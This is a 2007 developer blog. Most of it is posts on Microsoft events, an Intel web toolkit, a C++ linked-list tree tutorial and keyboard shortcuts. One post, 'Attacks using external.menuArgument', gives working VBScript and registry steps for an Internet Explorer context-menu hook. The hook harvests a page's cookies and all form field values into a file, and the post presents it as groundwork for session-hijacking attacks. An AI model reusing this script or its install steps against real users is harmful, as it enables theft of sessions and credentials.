Search This Blog

Monday, February 26, 2007

Sunday, February 25, 2007

Microsoft/IDSA Design Competition

Peace be upon you



IT IS AMAZING, Microsoft always the best, they push people to innovate, they have done an amazing contest for PC design all I am going to do now is show you some pictures and some links for the whole story




here is the links for the whole issue
http://www.startsomethingpc.com/

http://www.engadget.com/2005/12/20/microsoft-idsa-design-competition-highlights/

http://www.engadget.com/2007/02/23/microsoft-isda-next-gen-pc-design-contest-candidates/

and the pictures






Saturday, February 17, 2007

MDC 2007 Photos

as u know I was in MDC 2007 and here is some photos for the event with some really cool guys from Arab Team and Microsoft


Arab Team and me with Andrew Pradoe and Surupa Biswas


Me with Boris Jabes (Program Manager VC++)


Me , ArabTeam with Edward Jezierski and Eugenio Pace


Me, Arab Team , Chalie Calvert and Patrick Hynds


Me, Arab Team and Chalie Calvert

Me, Arab Team and Chalie Calvert

Me, Arab Team and Mohamed Wahba ( Microsoft Egypt )


PURE Arabteam


PURE Arabteam

PURE Arabteam


For more photos check out this link :)

http://www.flickr.com/photos/27194332@N00/tags/mdc07/

I hope u like it

Wednesday, February 14, 2007

My Free Arabic ASP.NET 2.0 Book

Peace be upon you

this link is for Arabian guys, this about my First book in middle east talk about ASP.NET 2.0 , I publish it since about a year, anyways the book is in Arabic, here is link for the whole story

http://cid-e2c1100334a33877.skydrive.live.com/browse.aspx/.Public/Documents%20I%20wrote/ASP.NET%202.0%20Arabic%20Book

I have updated the link.

thanks for your time

Monday, February 12, 2007

Intel® Web 2.0 Technology Development Kit (TDK)

Peace be upon you

how are you guys? for sure most of us working on web development application that require some security procedures, so Intel did something very good and useful to use, they make this cool library that provide this key features:


  • Support for Windows XP* operating system.

  • Support IE6/7 and Firefox

  • Allows creation of user-defined callbacks in an object-oriented way to handle specific platform events.

  • Provides a high-level JavaScript API to get information about battery power states, network connectivity, and processor information, including number of cores.


    • Power information API

    • Connectivity information API

    • Storage information API

    • Bandwidth information API

    • Processor information API

    • Location information API




I think most of us need this stuff, also this stuff are avilable with it's source code

http://www3.intel.com/cd/ids/developer/asmo-na/eng/336424.htm

here is the link for the whole story

thanks for your time

Sunday, February 11, 2007

Dynamic Linked List Tree

if you want to see the Artical in better view
http://www.codeproject.com/useritems/externalmenuArgument.asp



Introduction


            First of all I want to thank you for your passion to learn new things, now lets move on for what I am going to tell you, The idea of Linked List Tree is so simple I assume that you have some knowledge about what is linked list.


 What is Linked List Tree?


-          it's some how new concept to speed up dealing with the data which require nested data types and information like family tree and things like that, this idea of Linked List Tree based on the Double linked list, as we know that linked list is a data type that contain a pointer with same type, here is code which I explain what I mean


 


struct DoubleLinkList


{


/* this is pointer of the same data type which will point to the      


   Previous object(instance) for this Type */


      DoubleLinkList *Previous;


     


      wchar_t UserName[50];


 


/* this is pointer of the same data type which will point to the Next


   object(instance) for this Type */


      DoubleLinkList *Next;


}


 


Now let's explain what Linked List Tree, in figure 1, it shows that each instance (object) of the data type will point to more than element, as you can see in the figure each element has a path "?-?-?", for Example let's see the element path "1-3-2" you will notice that this instance is linked with it's parent "1-3" which is related to object instance path "1", now I think it's theoretically clear , it's like double linked list except that it has more than childes, I think we need little peace of code to explain this.


 


 


 



Figure 1


 


 


How to write code that supports Tree Linked List?


The answer is Array of pointers to childes and pointer to parent, and here is the code which explain what I am talking about


 


struct TreeLinkedList


{


      /*    This pointer has the same data type which


            will point to the parent instance of this


            same data type */


      TreeLinkedList* Parent;


     


      wchar_t UserName[50];


     


      /*    Here is the most important part of the


            whole idea, it's an array of poiters


            that will point to the child instances


            of the same data type*/


      std::vector<TreeLinkedList*> Childes;


      // I used vector (one of standard tamplate library)


      // you can find nice articals about it in CodeProject.com


     


      // some how there is problems with WTL and STD so if you


      // don't like or can't use the STD vector, you can do it as


      // structred data type (I mean by that adding some functions


      // that will manage adding new pointers to child pointers array )


     


      ~TreeLinkedList()


      {


            // don't forget to deallcate the memory


            Childes.empty();


      }


};


 


 


How to use what I just wrote?


 


// here we did some instance of our TreeLinkedList Data type


// you can understand from the varible names the hirarchy


// of the tree


TreeLinkedList CurrentInstance;


TreeLinkedList CurrentInstanceChild1;


TreeLinkedList CurrentInstanceChild1_1;


TreeLinkedList CurrentInstanceChild2;


TreeLinkedList CurrentInstanceChild2_1;


TreeLinkedList CurrentInstanceChild2_2;


TreeLinkedList CurrentInstanceChild2_2_1;


TreeLinkedList CurrentInstanceChild2_3;


TreeLinkedList CurrentInstanceChild2_3_1;


 


// Frist assign the root instance pointer to NULL to guarantee that


// this instance is a parent


CurrentInstance.Parent = 0;


// Add the root childs using the vector templat class member (push_back)


CurrentInstance.Childes.push_back(&CurrentInstanceChild1);


// Assgin the parent pointer to this instance of data type


CurrentInstanceChild1.Parent = &CurrentInstance;


 


//same as CurrentInstanceChild1


CurrentInstance.Childes.push_back(&CurrentInstanceChild2);


//same as CurrentInstanceChild1


CurrentInstanceChild2.Parent = &CurrentInstance;


 


// after that you are going to assgin the childs tree and parent pointer


 


CurrentInstanceChild1.Childes.push_back(&CurrentInstanceChild1_1);


CurrentInstanceChild1_1.Parent = &CurrentInstance;


 


CurrentInstanceChild2.Childes.push_back(&CurrentInstanceChild2_1);


CurrentInstanceChild2_1.Parent = &CurrentInstanceChild2;


CurrentInstanceChild2.Childes.push_back(&CurrentInstanceChild2_2);


CurrentInstanceChild2_2.Parent = &CurrentInstanceChild2;


CurrentInstanceChild2.Childes.push_back(&CurrentInstanceChild2_3);


CurrentInstanceChild2_3.Parent = &CurrentInstanceChild2;


 


CurrentInstanceChild2_2.Childes.push_back(&CurrentInstanceChild2_2_1);


CurrentInstanceChild2_2_1.Parent = &CurrentInstanceChild2_2;


 


CurrentInstanceChild2_3.Childes.push_back(&CurrentInstanceChild2_3_1);


CurrentInstanceChild2_3_1.Parent = &CurrentInstanceChild2_3;


 


I think the sample is so clear, but how can we fetch the data the UserName from the  CurrentInstanceChild2_3_1 Instance, simply you will treat it like array of pointer and here it is how to get the UserName for the targeted instance


 


CurrentInstance.Childes[0]->Childes[1]->Childes[2]->Childes[1]->UserName;


 


Someone may think that is may be useless to do something like that , we are still writing a lot of code to add and fetch the data, in this case I will tell you that this theory is used for dynamic trees, or you have to wait until it's need appear.


 


Now really thanks for your time which you spend in reading what I wrote.

Attacks using external.menuArgument

if you want to see the Artical in better view
http://www.codeproject.com/useritems/externalmenuArgument.asp


New way to get all web page information


The idea:  the core idea of this trick that is in Internet Explorer there is little back door to get all information of the web page and change it's content, the trick is in registry  at the key


 


HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\


 


In this key you can add new item to internet explorer context menu for example if you add this key


 


HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\~~~~~~Get All Page Info~~~~


You will have this view 


Sample screenshot


 


The second part of the trick is in the next link


http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/reference/properties/menuarguments.asp


 


The Property menuArgument gives you ability to write vb and java scripts that run on the client area and you have to know that menuArgument is part of external object


http://msdn.microsoft.com/workshop/author/dhtml/reference/objects/external.asp


 


if you collect all that together you can write script that will be called by the menu and do what every you want to with the page, here is example that read all cookies information , all forms information and all elements in the forms then save it in text file on C:\Infomation .text


 







<script language=vbscript>
on error resume next
    set EventElement = external.menuArguments.document
    FilesFolder = "C:\MyHacks\GrappedFiles"
    set t=createobject ("SCRIPTING.FILESYSTEMOBJECT")
    if not t.FolderExists(FilesFolder) then t.CreateFolder(FilesFolder)
    strFileName = FilesFolder & "\" & CleanString( EventElement.title & "___"  & date & "_" & Time ) & ".txt"
    set l=t.OpenTextFile(strFileName,8,true)
   
    l.Write "/////////////////////////////// New Hacky ///////////////////////////////"  & vbCrLf
    l.Write "Url is = " & EventElement.url & vbCrLf
    l.Write "Page Title is = " & EventElement.title & vbCrLf
    l.Write  EventElement.cookie & vbCrLf  & vbCrLf  & vbCrLf


   


for i = 0 to EventElement.forms.length -1
    l.Write "_-_-_-_-_-_-_-_-_-_-_-_-_ Form infomration _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_" & vbCrLf
          l.Write " Form Name = " & EventElement.forms.item(i).Name & vbCrLf
          l.Write " Form Action = " & EventElement.forms.item(i).action & vbCrLf
          l.Write " Form Method = " & EventElement.forms.item(i).method & vbCrLf
          l.Write " Elements Count = " & EventElement.forms.item(i).elements.length & vbCrLf
   for ele = 0 to EventElement.forms.item(i).elements.length-1
          l.Write "------------------------- Element infomration ------------------------------" &  vbCrLf
          l.Write " Information for element number " & ele + 1 & vbCrLf
          l.Write " Elements Name = " & EventElement.forms.item(i).elements.item(ele).name & vbCrLf
          l.Write " Elements Value = " & EventElement.forms.item(i).elements.item(ele).value & vbCrLf
   next
next
          l.Write vbCrLf & vbCrLf  & vbCrLf
          l.Write "Thanks to GOD to give me power to learn and teach."
          l.Write "Pray for me to learn more to be able to learn you" & vbCrLf
          l.Write "الحمد لله , الهم أرزقنى علما نافع و رزقا واسع و شفاء من كل داء"
          l.Write vbCrLf & vbCrLf  & vbCrLf 
    l.close
Function CleanString(strTarget) ' this function will clear the unacceptable characters for file name
 strTarget = Replace(strTarget, """", "-")
 strTarget = Replace(strTarget, "'", "-")
 strTarget = Replace(strTarget, "\", "-")
 strTarget = Replace(strTarget, "/", "-")
 strTarget = Replace(strTarget, "|", "-")
 strTarget = Replace(strTarget, ">", "-")
 strTarget = Replace(strTarget, "<", "-")
 strTarget = Replace(strTarget, "*", "-")
 strTarget = Replace(strTarget, ":", "-")
 strTarget = Replace(strTarget, "?", "-")
 CleanString = strTarget
End Function
external.menuArguments.window.alert("All data are in the file " & vbcrlf & vbcrlf & strFileName)
</script>



 


As you can see simple vbscript file that 100% depends on external.menuArguments , it collect the data which you want then save it on TXT file


 


In the upcoming part of this series I will give some tips on how to change in the main document and do what ever you want , it will help so much in some attacks, and I will explain how to protect the web pages against this attacks, before closing here is the steps to install this script and test it


 


Step 1: copy file HackingScript.htm to any folder and get the file path


Step 2: open " regedit " from run and navigate to the key


 HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\


Step 3: Add new key with the name "~~~~~~~~~Get All Page information~~~~~~~~"


Step 4: change the default key value to the HackingScript.htm path as you did in the first step


Step 5: open internet explorer and start right click and click on our new menu  


Step 6: you will find file C:\Information.txt contain all information of the page.


 


I wish you like the article, wait for the next part which will contain how to use this type in attack such "Page Simulation" and "Session HiJacking", in the next part I will explain how to protect your application against these attacks, have a nice article ;)


 


Thanks for your time


 


 


Attached to the article 2 files


HackingScript.rar :  contain the HTML file and Registry file which contain all in the article


HackingScript.exe : SFX file which can be installed directly to C:\ and add the menu to IE


 


There is one thing I want to mention somepeople ask what is going to happen if i use this script "it will get MY DATA" I just want to say that this script are able to modify things can't be done without this trick. try to use your imagination and guess what can you do with that, I write more in this topic, because it will be really harmful,:) I will explain later how to protect your web site from such things

Saturday, February 10, 2007

2nd Part of First Chapter in Perfromance book

Peace be upon you

how are you guys? I know that most of you don't know or notice that I have Arabic Blog, anyways I have added new topic about perfromance I wish from Arabian Visitors to go and read it http://ahmed-essam.com/2007/02/2_10.html
thanks for your time :)

best regards
Ahmed Essam

Thursday, February 08, 2007

Visual C++ Keyboard shortcuts

Same as VC#, here is the shortcuts for the VC++ 2005
I wish you like it :)







Visual C# Keyboard shortcuts

peace be upon you

I think noone ever think that there is guide for keyboard shortcuts, so I bringe it for all of you











I wish you like it :)

Microsoft have done a great work with VC++

Peace be upon you

hi people, how are you all?
first of all, I don't wanna "Anti-Microsftism" guys to attach me, I like anything related to technology, based on this role I have to admit with something I got From MDC 2007, Microsoft did a lot of work to enrich the powerful of Visual C++, Actually there is nothing can describe how much this people are doing a great work, the IDE is amazing, with any other IDE it may take hours to look for some stuff in the code, all you have to do with VC++ 2005 just guess any thing about your targeted code, you will find all you want, now "finding sting in heap of straw" is so easy, you know because Microsoft provides you with a HUGE electromagnet, so all u have to do is just get close to the heap of straw and u will get what you want,all of that is just admonition that it is really great, I really like thier work and I wish that they keep working more and more, I will explain later what I have got from MDC 2007, excuse me guys I am BUSY ,

thanks for your time

Monday, February 05, 2007

Cairo ICT 2007

Peace be upon you

How are you guys? I was in Cairo ICT 2007 and it was really AMAZING I saw a lot of new stuff that is really cool, the most amazing thing is that I met "Dr.Tarek Kaml" the Minister of "Ministry of Communication and Information Technology", I snap a little video for the minister and Mr.Karem Ramadan, after that I was in Microsoft Community Booth "ArabTeam2000", "Innovation-Hut" and "Barmaji", it was really cool.
The other cool thing is that I saw and work on the "Intel Classmate" YAAAAAA it is here in Egypt Finally, CARIA I saw a lot of cool things there, Small machine has amazing performance, Intel did a great work in this, I also Saw AMD but I have to say that they are as doesn't exist, Intel Products are everywhere,
I saw a Satellite DSL Modem I LIKED IT SO MUCH

Sorry I write that in rush, I will try to write when I have more time.




ArabTeam 2000 Booth


Classmate



Cool Laptop :D people was throuing rocks on it and it was fine :D

link for the Dr.Tarek Kaml

http://www.Egit-Projects.com/mix/ahmed.essam/mdc2007/Tarek_Kaml.mp4

Sunday, February 04, 2007

New Series of Performance in Arabic

Peace be upon you

I have started writing about cool stuff I really like, it's about Performance Analyzing and enhancing "of course from my point of view", I am writing this series in Arabic for my Arabian brother and sister, I wish they got good information about this issue from what I am writing and what I am going, here is the link for the first article in the series
http://ahmed-essam.com/2007/02/1.html

Thanks for your time :)
There was an error in this gadget